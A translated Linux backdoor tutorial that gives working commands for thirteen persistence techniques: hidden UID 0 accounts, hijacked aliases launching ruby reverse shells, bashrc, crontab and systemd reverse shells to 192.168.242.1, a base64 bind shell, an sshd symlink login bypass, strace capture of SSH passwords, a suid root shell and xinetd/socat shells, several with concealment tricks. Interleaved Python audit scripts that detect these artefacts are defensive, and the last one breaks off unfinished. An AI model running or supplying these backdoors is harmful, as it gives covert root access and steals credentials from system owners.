2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article explains how to understand backdoors on Linux systems. In daily operation many people have doubts about this topic, so the editor consulted various materials and sorted out simple, practical procedures that I hope will help answer those doubts. Please follow along with the editor.
Platform and tool versions:
Host system: Manjaro Linux (192.168.242.1)
Hypervisor: VMware Workstation 16
Virtual machines: CentOS 7 (192.168.242.133), Ubuntu (192.168.242.143), CentOS 6.5 (192.168.242.132)
1. Linux system creates backdoor accounts with uid 0
(1) CentOS 7: create users with uid 0 from the command line
1. Create directly
useradd -o -u 0 backdoor && echo "Eu2xa2fu@#" | passwd backdoor --stdin
It is verified that you can log in normally.
// create the user interactively and set the password
useradd -o -u 0 test1
passwd test1
2. Combine the command with PROMPT_COMMAND
(1) Write the /root/.bashrc file
vi /root/.bashrc // edit the root user's configuration file and add the following
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
Save and exit.
source /root/.bashrc // executes the instructions in the file, and the account is created.
Each time you switch to root later, the instructions in /root/.bashrc are executed and the account is created.
(2) Verification
cat /etc/passwd | grep hack
The backdoor account was created successfully.
(2) Ubuntu system
useradd -p `openssl passwd -1 -salt 'abc' pass1234` -u 0 -o -g root -G root -s /bin/bash hack
Created successfully.
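As an added example (not from the original article), the Python audit below reads /etc/passwd and reports exactly what the commands above leave behind: extra UID 0 entries (what `useradd -o -u 0` creates) and UIDs shared by several names. PASSWD_SAMPLE is constructed data, not a real host's file.

```python
# Added example: audit an /etc/passwd file for the UID 0 backdoor accounts
# described above. PASSWD_SAMPLE is constructed test data, not a real host's file.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
user1:x:1000:1000::/home/user1:/bin/bash
backdoor:x:0:0::/home/backdoor:/bin/bash
hack:x:0:0::/home/hack:/bin/bash
this line is malformed and must be skipped, not crash the audit
"""


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for every well-formed passwd entry."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry: skip it rather than abort the whole audit
        name, _pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        yield name, int(uid), int(gid), home, shell


def find_uid0_accounts(text, allowed=("root",)):
    """Names with UID 0 other than the expected ones (what `useradd -o -u 0` produces)."""
    return [name for name, uid, _gid, _home, _shell in parse_passwd(text)
            if uid == 0 and name not in allowed]


def find_shared_uids(text):
    """Map each UID used by more than one account to the list of names using it."""
    by_uid = {}
    for name, uid, _gid, _home, _shell in parse_passwd(text):
        by_uid.setdefault(uid, []).append(name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


if __name__ == "__main__":
    import sys
    # Pass a real passwd file as the first argument; otherwise the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else PASSWD_SAMPLE
    print("extra UID 0 accounts:", find_uid0_accounts(text))
    print("shared UIDs:", find_shared_uids(text))
```

The one-line shell equivalent of the first check is `awk -F: '$3 == 0' /etc/passwd`; the script adds the shared-UID view and tolerates damaged lines.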
2. CentOS 7 system creates alias backdoor
(1) Create aliases for Linux system commands such as ls
1. The controlled side creates the alias
// use ruby to implement the reverse connection (received with netcat). Once the ruby reverse connection is established it moves to the background without exposing any trace, which makes it very hidden; this form is recommended. Note that the internal double quotation marks are all written as "'".
alias ls="alerts() { ls $* --color=auto; ruby -rsocket -e 'exit if fork;c=TCPSocket.new("' "" 192.168.242.1 ","5555"); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'; }; alerts"
// use ruby to implement the reverse connection (received with msfconsole). Pay attention to the nesting of double quotes.
alias ls="alerts() { ls $* --color=auto; ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"" 192.168.242.1 ","5555")).connect; while(cmd=c.gets); IO.popen(cmd.to_s,"r"){|io| c.print io.read} end'; }; alerts"
2. The attacker listens on a local port
nc -l -p 5555
3. The administrator of the controlled side runs the ls command (the ruby variant received by netcat)
4. The attacker gets a reverse shell.
(2) Create aliases for alias and unalias
Because the alias command lists the current aliases, it would expose the reverse-connection instruction hidden in ls, so the alias command must be hijacked so that the instruction does not appear in its output. In addition, the unalias command clears aliases, so it must be hijacked too, to prevent the ls alias from being removed.
1. Create an alias for unalias
// if you create the alias for alias first, alias loses its original function and the alias for unalias can no longer be created.
alias unalias='alerts() { if [ $# != 0 ]; then if [ $* != "ls" ] && [ $* != "alias" ] && [ $* != "unalias" ]; then unalias $*; else echo "-bash: unalias: ${*}: not found"; fi; else echo "unalias: usage: unalias [-a] name [name ...]"; fi; }; alerts'
The ls alias is not cleared.
2. Create an alias for alias
vi /tmp/.alias.txt // add the following
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
Save and exit.
alias alias="cat /tmp/.alias.txt"
(3) Add the aliases in a hidden location
1. Create a plausible file in a normal location
vi /etc/yum/yum-update.rc // create the file and add the alias settings
alias ls="alerts() { ls $* --color=auto; ruby -rsocket -e 'exit if fork;c=TCPSocket.new("' "" 192.168.242.1 ","5555"); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'; }; alerts"
alias unalias='alerts() { if [ $# != 0 ]; then if [ $* != "ls" ] && [ $* != "alias" ] && [ $* != "unalias" ]; then unalias $*; else echo "-bash: unalias: ${*}: not found"; fi; else echo "unalias: usage: unalias [-a] name [name ...]"; fi; }; alerts'
alias alias="cat /tmp/.alias.txt"
Save and exit.
2. Copy the timestamps of a normal file onto the file containing the aliases
touch -acmr version-groups.conf yum-update.rc
3. Use the aliases to establish the connection
Actions taken by the attacker:
The attacker gets a reverse shell:
3. CentOS 7 system creates bashrc backdoor
(1) The attacker writes malicious instructions into the ~/.bashrc file
su // switch to root
echo 'bash -i >& /dev/tcp/192.168.242.1/5555 0>&1' > ~/.bashrc
(2) The attacker listens on a local port
nc -l -p 5555
(3) The administrator logs in to the attacked server
su // the administrator logs in as a normal user and then switches to root
(4) The attacker gets a reverse connection.
nc -l -p 5555
Getting the shell shows that the reverse-connection instruction in the .bashrc file was executed.
4. CentOS 7 system creates crontab backdoor
(1) Add a scheduled task
Method 1. Use the crontab command to create the scheduled task and use nc to receive the connection
1. Add a non-hidden scheduled task
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1"; } | crontab -
// performs a reverse connection every minute
The scheduled task was added successfully.
nc -l -p 5555 // the attacker listens on the local port
Getting the shell shows that the scheduled task was executed.
2. Add the scheduled task in a hidden way
(crontab -l; printf "*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1;\rno crontab for `whoami`%100c\n") | crontab -
The administrator cannot see the added scheduled task with crontab -l.
Explanation:
crontab saves the user's scheduled tasks in the file /var/spool/cron/<username>. crontab -l actually uses the cat command to display this file:
But opening the file with vim shows its real contents:
You can also see the true contents of the file with the -A option of the cat command:
cat -A /var/spool/cron/root
The attacker gets a reverse connection:
Method 2. Write the /etc/crontab file directly and receive the connection with msfconsole
sh -c "echo '* * * * * root cd /tmp && mknod backpipe p && nc 192.168.242.1 5555 0<backpipe | /bin/bash 1>backpipe' >> /etc/crontab"
The attacker receives the reverse connection:
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.242.1
set lport 5555
exploit
The connection arrives within one minute:
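Both cron methods above leave a line in a crontab file; the carriage-return trick only hides it from a terminal, which is why `cat -A` and vim still show it. As an added example (not from the original article), this Python audit reads a crontab as bytes, reports entries that contain a carriage return together with what actually runs versus what the terminal shows, and flags reverse-connection tooling in /etc/crontab-style lines. Both samples are constructed; the tool list is my own.

```python
import re

# Constructed crontab spool bytes (what `crontab -l` streams). The second entry hides
# itself behind a carriage return, a fake "no crontab" message and space padding.
SPOOL_SAMPLE = (
    b"0 3 * * * /usr/local/bin/backup.sh\n"
    b"*/1 * * * * bash -i >& /dev/tcp/192.168.242.1/5555 0>&1;\rno crontab for root"
    + b" " * 100 + b"\n"
)
# Constructed system crontab (with the user field); the last entry is the mknod/nc pipe.
SYSTEM_CRONTAB_SAMPLE = (
    b"SHELL=/bin/bash\n"
    b"17 * * * * root cd / && run-parts /etc/cron.hourly\n"
    b"* * * * * root cd /tmp && mknod backpipe p && nc 192.168.242.1 5555 0<backpipe | /bin/bash 1>backpipe\n"
)

# Pseudo-devices and tools that have no business in a cron entry (assumed list for the demo).
SUSPECT = re.compile(rb"/dev/(?:tcp|udp)/|(?<![\w-])(?:nc|ncat|socat|mknod|bash -l?i)(?![\w-])")


def audit_crontab(raw):
    """Return (lineno, reason, detail) for suspicious entries in raw crontab bytes.

    Splitting on b"\\n" only is deliberate: a \\r inside a line is data, and cron hands
    the whole line, carriage return included, to the shell as the command.
    """
    findings = []
    for lineno, line in enumerate(raw.split(b"\n"), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(b"#"):
            continue
        if b"\r" in line:
            runs, shown = line.split(b"\r", 1)
            findings.append((lineno, "carriage return hides entry",
                             f"runs: {runs.decode(errors='replace')!r}; "
                             f"terminal shows: {shown.strip().decode(errors='replace')!r}"))
        if SUSPECT.search(line):
            findings.append((lineno, "reverse-connection tooling in entry",
                             line.split(b"\r", 1)[0].decode(errors="replace")))
    return findings


if __name__ == "__main__":
    for sample in (SPOOL_SAMPLE, SYSTEM_CRONTAB_SAMPLE):
        for lineno, reason, detail in audit_crontab(sample):
            print(f"line {lineno}: {reason}: {detail}")
```

On a live host, feed it the raw spool files (`/var/spool/cron/*`) and `/etc/crontab` rather than the output of `crontab -l`, so the carriage return is seen as a byte and not rendered.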
5. CentOS 7 system creates a backdoor through the PROMPT_COMMAND environment variable
(1) Create the backdoor and listen on port 1025
vi ~user1/.bashrc // modify the configuration file and add the following
export PROMPT_COMMAND="lsof -i :1025 &>/dev/null || (python -c \"exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))\" 2>/dev/null &)"
Save and exit.
source ~/.bashrc // make the configuration take effect immediately
netstat -an | grep :1025 // check that port 1025 is listening
Each time user1 logs in, the instructions in its .bashrc file run automatically, that is, listening on port 1025 starts.
(2) The attacker connects remotely
nc 192.168.242.133 1025
If the connection succeeds, you get a shell.
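Sections 2, 3 and 5 all persist through files that bash sources at login. As an added example (not from the original article), the Python audit below scans rc-file text for the three patterns those sections rely on: aliases that wrap a shell function or call an interpreter, network or account tool; aliases that hijack alias, unalias or which; and PROMPT_COMMAND hooks or bare reverse-connection lines. RC_SAMPLE is constructed, and the regexes and tool list are my own.

```python
import re

# Constructed ~/.bashrc sample carrying the hooks from sections 2, 3 and 5.
RC_SAMPLE = r'''# constructed sample, not a real host's file
alias ll='ls -l --color=auto'
alias vi='vim'
alias ls="alerts() { ls $* --color=auto; ruby -rsocket -e 'c=TCPSocket.new(ADDR,PORT)'; }; alerts"
alias unalias='alerts() { if [ $# != 0 ]; then unalias $*; fi; }; alerts'
alias alias="cat /tmp/.alias.txt"
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && unset PROMPT_COMMAND"
bash -i >& /dev/tcp/192.168.242.1/5555 0>&1
'''

ALIAS_RE = re.compile(r"""^\s*alias\s+([^=\s]+)=(['"])(.*)\2\s*$""")
PROMPT_RE = re.compile(r"^\s*(?:export\s+)?PROMPT_COMMAND=")
# Interpreters, network tools, pseudo-devices and account tools that do not belong in an rc file.
SUSPECT = re.compile(r"(?<![\w-])(?:ruby|python[23]?|perl|nc|ncat|socat|TCPSocket|/dev/tcp|/dev/udp"
                     r"|bash -l?i|useradd|chpasswd)(?![\w-])")
INTROSPECTION = {"alias", "unalias", "which", "type", "command"}  # builtins an admin uses to look


def audit_rc(text):
    """Return (lineno, subject, reason) for every suspicious line of an rc file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = ALIAS_RE.match(line)
        if m:
            name, _quote, body = m.groups()
            if name in INTROSPECTION:
                findings.append((lineno, name, "introspection builtin hijacked by alias"))
            if "() {" in body or "(){" in body:
                findings.append((lineno, name, "alias body defines a shell function"))
            if SUSPECT.search(body):
                findings.append((lineno, name, "alias body calls an interpreter, network or account tool"))
            continue
        if PROMPT_RE.match(line):
            findings.append((lineno, "PROMPT_COMMAND", "hook runs before every prompt"))
        if SUSPECT.search(line):
            findings.append((lineno, stripped.split()[0], "line calls an interpreter, network or account tool"))
    return findings


if __name__ == "__main__":
    for lineno, subject, reason in audit_rc(RC_SAMPLE):
        print(f"line {lineno}: {subject}: {reason}")
```

Run it over every file bash reads (/etc/profile, /etc/bashrc, /etc/profile.d/*, ~/.bashrc, ~/.bash_profile) and over any file those source, since section 2 deliberately parks the aliases under /etc/yum.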
6. CentOS 7 system creates ssh service backdoor
Principle: the Linux soft-link ssh backdoor requires sshd to support PAM authentication. Give the sshd soft link the name su; when the program starts, it looks in the PAM configuration for the entry that corresponds to su.
(1) Create the ssh backdoor
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337
Listening starts on port 31337.
You can also use the following commands to listen on a port:
ln -sf /usr/sbin/sshd /usr/local/su; /usr/local/su -oPort=12345
ln -sf /usr/sbin/sshd /tmp/chsh; /tmp/chsh -oPort=12345
ln -sf /usr/sbin/sshd /tmp/chfn; /tmp/chfn -oPort=12345
(2) Connect remotely to the ssh backdoor
ssh -p 31337 root@192.168.242.133
Use root, bin, ftp or mail as the user name; the password is arbitrary, and you can log in.
7. Manjaro 20 system creates ssh client backdoor
(1) Create an alias for the ssh command
Attacker: Manjaro 20 system; edit the user's .bashrc configuration file.
vi ~/.bashrc // add the following instruction at the end of the file
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
Save and exit.
source ~/.bashrc
(2) Obtain the ssh account password
1. A user on the Manjaro system initiates an ssh connection
ssh user1@192.168.242.133 // a normal user makes an ssh connection and a record is generated in the /tmp directory
2. Obtain the ssh account and password
cat /tmp/sshpwd-2411111606192953.log | grep -n password | grep write // find the line holding the specified information; here it is line 89.
less /tmp/sshpwd-2411111606192953.log
Enter 89g to jump to line 89.
The password is right there: 123456
8. CentOS 7 system creates ssh certificate backdoor
(1) The attacker generates an asymmetric key pair
ssh-keygen -t rsa // generate a public-private key pair and enter a passphrase
(2) The CentOS 7 server configuration allows public key login
vi /etc/ssh/sshd_config // edit the configuration file and set the following
PermitRootLogin yes
StrictModes no
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
RSAAuthentication yes
Save and exit.
Note:
(1) The RSAAuthentication yes line needs to be written by hand as the last line of the configuration file.
(2) In the AuthorizedKeysFile parameter, %h stands for the home directory in use, and there is a dot after %h/. Without that dot you get the error "Permission denied (publickey)" and cannot connect.
(3) Remember to remove the comment character at the beginning of each line.
systemctl restart sshd // restart the ssh service
The configuration takes effect.
(3) The attacker uploads the certificate
scp ~/.ssh/id_rsa.pub root@192.168.242.133:~ // the attacker uploads the local user's public key to the server
Uploaded successfully. Note that it can be copied to the user's home directory, but do not copy it to ~/.ssh/id_rsa.pub, which would overwrite the target host's own public key file. Note also that the id_rsa.pub file is not hidden.
You can also use ssh-copy-id to copy your own public key to the target system:
ssh-copy-id -i ~/.ssh/id_rsa.pub root@192.168.242.133
(4) The CentOS 7 server adds the attacker's public key to authorized_keys
cat /root/id_rsa.pub >> ~/.ssh/authorized_keys
systemctl restart sshd // restart the ssh service
(5) The attacker logs in to the server with the certificate
ssh -i /root/.ssh/id_rsa root@192.168.242.133
// since the public key was uploaded to the home directory of the server's root account, the root user must be specified here. If it is not, the attacker's current user, user1, is used by default; the public key was never uploaded to the server's user1 home directory, so password authentication would be required to log in.
9. CentOS 7 system creates suid backdoor
(1) Create the suid backdoor file
1. Create the source code file
sudo echo 'int main(){setresuid(0,0,0);system("/bin/sh");}' > privshell.c
2. Compile
sudo gcc -o privshell privshell.c // compiled into an executable file named privshell
3. Give execute permission and set the suid flag bit
sudo chown root:root privshell && sudo chmod u+s privshell
(2) An ordinary user executes the suid backdoor to obtain root privileges
./privshell
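Sections 6 and 9 both leave a file-system artefact: a symlink that resolves to the sshd binary under another name, and a set-uid executable outside the usual system directories. As an added example (not from the original article), the Python audit below finds both; its demo() builds a constructed directory layout in a temp dir rather than touching a real host. The sshd path, directory names and file contents in demo() are assumptions for the demo.

```python
import os
import stat
import tempfile


def find_renamed_sshd_links(root, sshd_path):
    """Symlinks under root that resolve to sshd_path but carry a different name.

    The PAM backdoor above works because sshd picks its PAM service by the name it was
    started as, so every such link (su, chsh, chfn, ...) deserves a look.
    """
    target = os.path.realpath(sshd_path)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if (os.path.islink(path) and os.path.realpath(path) == target
                    and name != os.path.basename(sshd_path)):
                hits.append(path)
    return sorted(hits)


def find_suid_files(root, baseline=()):
    """(path, owner_uid) for regular files under root with the set-uid bit, minus a baseline.

    A root-owned hit outside the system bin directories is what the privshell recipe
    above produces; on a real host compare against a package-manager baseline.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink is never itself set-uid
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and path not in baseline:
                hits.append((path, st.st_uid))
    return sorted(hits)


def demo():
    """Build a constructed layout and audit it; returns (link paths, suid paths) relative to it."""
    base = tempfile.mkdtemp(prefix="audit-demo-")
    os.makedirs(os.path.join(base, "usr/sbin"))
    os.makedirs(os.path.join(base, "tmp"))
    sshd = os.path.join(base, "usr/sbin/sshd")
    with open(sshd, "wb") as f:
        f.write(b"\x7fELF")                          # stand-in for the real binary
    os.symlink(sshd, os.path.join(base, "tmp/su"))    # the ln -sf trick from section 6
    os.symlink(sshd, os.path.join(base, "tmp/chsh"))
    privshell = os.path.join(base, "tmp/privshell")
    with open(privshell, "wb") as f:
        f.write(b"\x7fELF")
    os.chmod(privshell, 0o4755)                       # the set-uid bit from section 9
    with open(os.path.join(base, "tmp/notes.txt"), "w") as f:
        f.write("harmless\n")
    links = [os.path.relpath(p, base) for p in find_renamed_sshd_links(base, sshd)]
    suid = [os.path.relpath(p, base) for p, _uid in find_suid_files(base)]
    return links, suid


if __name__ == "__main__":
    print(demo())
```

The equivalent one-off shell checks are `find / -xdev -perm -4000 -type f` and `find / -xdev -type l -lname '*sshd'`; the script is the form you would schedule and diff against a baseline.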
10. CentOS 7 system creates systemd service backdoor
(1) Create the backdoor
1. Create the service description file
cd /usr/lib/systemd/system
touch backdoor.service
vi backdoor.service // edit the file and add the following
[Unit]
Description=Very important backdoor.
After=network.target
[Service]
Type=forking
ExecStart=nc -e /bin/bash 192.168.242.1 5555 >/dev/null 2>&1
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
Save and exit.
2. Give execute permission
chmod +x /usr/lib/systemd/system/backdoor.service
3. Make the service effective
systemctl daemon-reload // reread the service information
(2) The attacker listens on a local port
nc -l -p 5555
(3) The controlled side starts the backdoor
systemctl enable backdoor
systemctl start backdoor
(4) The attacker obtains a shell
11. CentOS 7 system creates tcp wrapper backdoor
TCP_Wrappers is a security tool that works at the application layer and can protect specific applications or services. For example, requests for ssh, telnet, FTP and other services are intercepted by TCP_Wrappers first.
TCP_Wrappers has a daemon for TCP called tcpd. Take telnet as an example: whenever a telnet connection request arrives, tcpd intercepts it and first reads the access control file set by the system administrator. If the request meets the rules, the connection is handed intact to the real telnet process, which completes the rest of the work. If the IP that initiated the connection does not match the settings in the access control file, the connection request is dropped.
(1) Operation on the attacked server
1. Create the tcp wrapper backdoor
vi /etc/hosts.allow // edit the configuration file and add the following
ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/192.168.242.1/443 0>&1") & : allow
Save and exit.
The instruction above allows all connections, and whenever a connection appears it starts bash to make the reverse connection.
(2) The attacker operates locally
1. Listen on the local port
sudo nc -l -p 443
2. Connect to the target server
ssh 192.168.242.133 // connect to port 22 of the target server
No password needs to be entered.
3. Receive the reverse connection
The reverse shell was obtained successfully, with root privileges.
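Sections 10 and 11 persist in two small configuration files, a systemd unit and /etc/hosts.allow, and both are easy to audit by parsing rather than by eye. As an added example (not from the original article), the Python below parses a unit file and flags Exec lines that start a network tool or embed a remote address, and parses hosts.allow rules and flags ALL: ALL matches and spawn/twist commands. The two samples are constructed copies of the files written above; the tool list is an assumption.

```python
import os
import re

# Constructed copies of the unit file and hosts.allow rule written above.
UNIT_SAMPLE = """\
[Unit]
Description=Very important backdoor.
After=network.target
[Service]
Type=forking
ExecStart=nc -e /bin/bash 192.168.242.1 5555 >/dev/null 2>&1
PrivateTmp=true
[Install]
WantedBy=multi-user.target
"""
HOSTS_ALLOW_SAMPLE = """\
# constructed /etc/hosts.allow
sshd: 192.168.242.
ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/192.168.242.1/443 0>&1") & : allow
"""

NET_TOOLS = {"nc", "ncat", "netcat", "socat", "bash", "sh", "python", "perl", "ruby"}  # assumed
EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost", "ExecReload", "ExecStop")
ADDR_RE = re.compile(r"/dev/(?:tcp|udp)/|\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_unit(text):
    """Minimal systemd unit parser: {section: [(key, value), ...]}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections


def audit_unit(text):
    """(key, reason) pairs for Exec lines that start a network tool or carry an address."""
    findings = []
    for key, value in parse_unit(text).get("Service", []):
        if key not in EXEC_KEYS or not value:
            continue
        program = os.path.basename(value.split()[0].lstrip("@-:+!"))  # drop systemd exec prefixes
        if program in NET_TOOLS:
            findings.append((key, f"{program} started directly by systemd"))
        if ADDR_RE.search(value):
            findings.append((key, "remote address in command line"))
    return findings


def audit_hosts_allow(text):
    """(lineno, reason) pairs for rules that admit everyone or run a command on connect."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split(":")]
        if len(fields) < 2:
            continue
        daemons, clients, options = fields[0], fields[1], ":".join(fields[2:])
        if daemons.upper() == "ALL" and clients.upper() == "ALL":
            findings.append((lineno, "ALL: ALL matches every daemon and client"))
        if re.search(r"\b(?:spawn|twist)\b", options):
            findings.append((lineno, "spawn/twist runs a command on every connection: " + options))
    return findings
```

Point audit_unit at every file under /etc/systemd/system and /usr/lib/systemd/system; a unit enabled by `systemctl enable` also leaves a symlink in the matching *.wants directory, which is a second place to look.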
12. Ubuntu 16.04 system creates rhosts++ backdoor
(1) Deploy the rsh service
1. Install rsh and xinetd
apt-get install rsh-client rsh-server xinetd
2. Configure xinetd
touch /etc/xinetd.d/rsh && vi /etc/xinetd.d/rsh // add the following
# default: on
# description: The rshd server is the server for the rcmd(3) routine and,\
#   consequently, for the rsh(1) program. The server provides\
#   remote execution facilities with authentication based on\
#   privileged port numbers from trusted hosts.
service shell
{
    disable         = no
    socket_type     = stream
    wait            = no
    user            = root
    log_on_success  += USERID
    log_on_failure  += USERID
    server          = /usr/sbin/in.rshd
}
/etc/xinetd.d/rlogin
# default: on
# description: rlogind is the server for the rlogin(1) program. The server\
#   provides a remote login facility with authentication based on\
#   privileged port numbers from trusted hosts.
service login
{
    disable         = no
    socket_type     = stream
    wait            = no
    user            = root
    log_on_success  += USERID
    log_on_failure  += USERID
    server          = /usr/sbin/in.rlogind
}
/etc/xinetd.d/rexec
# default: off
# description: Rexecd is the server for the rexec(3) routine. The server\
#   provides remote execution facilities with authentication based\
#   on user names and passwords.
service exec
{
    disable         = no
    socket_type     = stream
    wait            = no
    user            = root
    log_on_success  += USERID
    log_on_failure  += USERID
    server          = /usr/sbin/in.rexecd
}
Save and exit.
/etc/init.d/xinetd restart // restart the service; rsh and the other services start
(2) Create the rhosts++ backdoor
1. Modify the configuration file
vi /root/.rhosts // edit the file and add the following
+ +
Save and exit.
2. The attacker accesses the Ubuntu host remotely
rsh 192.168.242.143 date // remote execution of a system command
Executed successfully.
rsh 192.168.242.143 /bin/bash // get a shell on the remote system
The backdoor was created successfully.
13. Ubuntu 16.04 system creates xinetd backdoor
(1) Install the xinetd and telnetd services
1. Install the xinetd and telnetd packages
sudo apt-get install xinetd telnetd
dpkg -L xinetd | grep '/usr/sbin/\|/etc/' // view the executable and configuration files of xinetd
/usr/sbin/xinetd
/usr/sbin/itox
/usr/sbin/xconv.pl
/etc/init
/etc/init/xinetd.conf
/etc/xinetd.conf
/etc/init.d
/etc/init.d/xinetd
/etc/default
/etc/default/xinetd
/etc/xinetd.d
/etc/xinetd.d/daytime
/etc/xinetd.d/time
/etc/xinetd.d/discard
/etc/xinetd.d/echo
/etc/xinetd.d/chargen
dpkg -L telnetd | grep '/usr/sbin\|/etc/' // view the executable and configuration files of telnetd
/usr/sbin
/usr/sbin/in.telnetd
The telnetd package has only executable files and no configuration files.
2. Configure xinetd
vi /etc/xinetd.d/telnet // does not exist by default; create it and add the following
# default: on
# description: The telnet server serves telnet sessions; it uses\
#   unencrypted username/password pairs for authentication.
service telnet
{
    disable         = no
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/in.telnetd
    log_on_failure  += USERID
}
Save and exit.
/etc/init.d/xinetd restart // restart the xinetd service
netstat -an | grep :23 // check the listening port
3. Allow root to log in remotely
vi /etc/securetty // add the following
pts/0
pts/1
pts/2
pts/3
Save and exit.
service xinetd restart // restart the service
In this way, root can log in to Linux from terminals pts/0 to pts/3.
(2) Configure the telnetd backdoor
1. Create the backdoor script
touch telnetd.sh && chmod +x telnetd.sh
vi telnetd.sh // edit the file and add the following
#!/bin/bash
socat udp-connect:192.168.242.1:5555 exec:'bash -li',pty,stderr,sane 2>&1 >/dev/null &
/usr/sbin/in.telnetd
Save and exit.
2. Modify the telnet service configuration file
vi /etc/xinetd.d/telnet
server = /usr/sbin/in.telnetd
Change to
server = /home/user1/telnetd.sh
Save and exit.
/etc/init.d/xinetd restart // restart the xinetd service
netstat -an | grep :23 // check the listening port
3. The attacker listens on a local port
nc -ul -p 5555
4. The attacker accesses the telnet port of the target host
telnet 192.168.242.143
The telnet service is triggered and executes the script specified in the service configuration.
5. The attacker gets a reverse shell
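Sections 12 and 13 both ride on xinetd service blocks and on a trust file. As an added example (not from the original article), the Python below parses /etc/xinetd.d blocks and flags an enabled service whose server lives outside the system directories (the telnetd.sh swap above) or that is a cleartext legacy service running as root (telnet, shell, login, exec), and flags the "+ +" wildcard in .rhosts. Both samples are constructed; the trusted-directory list is an assumption.

```python
import re

# Constructed /etc/xinetd.d/telnet after the change in section 13, and a constructed .rhosts.
XINETD_SAMPLE = """\
# default: on
service telnet
{
    disable         = no
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    server          = /home/user1/telnetd.sh
    log_on_failure  += USERID
}
"""
RHOSTS_SAMPLE = "+ +\n"

TRUSTED_SERVER_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/")  # assumption for the demo
LEGACY_CLEARTEXT = {"telnet", "shell", "login", "exec"}  # in.telnetd, in.rshd, in.rlogind, in.rexecd


def parse_xinetd(text):
    """{service: {attribute: value}} for every service block; +=/-= values are kept as text."""
    services, name, attrs = {}, None, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        m = re.match(r"service\s+(\S+)$", line)
        if m:
            name, attrs = m.group(1), {}
        elif line == "}" and name is not None:
            services[name] = attrs
            name = attrs = None
        elif attrs is not None:
            m = re.match(r"(\w+)\s*(?:\+=|-=|=)\s*(.*)$", line)
            if m:
                attrs[m.group(1)] = m.group(2).strip()
    return services


def audit_xinetd(text):
    """(service, reason) pairs for enabled services that look like the backdoor above."""
    findings = []
    for svc, attrs in parse_xinetd(text).items():
        if attrs.get("disable", "no").lower() != "no":
            continue  # a disabled service cannot be triggered
        server = attrs.get("server", "")
        if server and not server.startswith(TRUSTED_SERVER_DIRS):
            findings.append((svc, f"server outside system directories: {server}"))
        if svc in LEGACY_CLEARTEXT and attrs.get("user") == "root":
            findings.append((svc, "cleartext legacy service enabled as root"))
    return findings


def audit_rhosts(text):
    """(lineno, reason) for .rhosts lines that trust any host (+), optionally for any user (+ +)."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if fields and fields[0] == "+":
            any_user = len(fields) > 1 and fields[1] == "+"
            findings.append((lineno, "any host trusted" + (" for any user" if any_user else "")))
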